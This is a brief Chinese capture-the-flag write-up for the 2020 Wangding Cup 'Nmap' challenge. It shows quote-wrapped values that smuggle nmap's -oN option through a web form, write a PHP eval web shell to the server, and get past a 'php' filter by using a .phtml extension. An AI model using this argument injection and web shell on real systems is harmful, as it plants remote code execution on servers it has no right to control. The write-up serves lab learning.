[网鼎杯 2020 朱雀组]Nmap
nmap
本题的考点是利用nmap的-oN写shell。
nmap -oN xxx.txt
先构造:
' -oN w4ke.txt '
返回了Host maybe down,然后访问一下w4ke.txt
构造:
' -oN w4ke.php <?php eval($_POST['w4ke']); ?> '
返回了Hacker...
fuzz了一下,发现了php被过滤,phtml可以用。
于是构造:
' -oN w4ke.phtml <?=eval($_POST['w4ke']); ?> '
cat flag 即可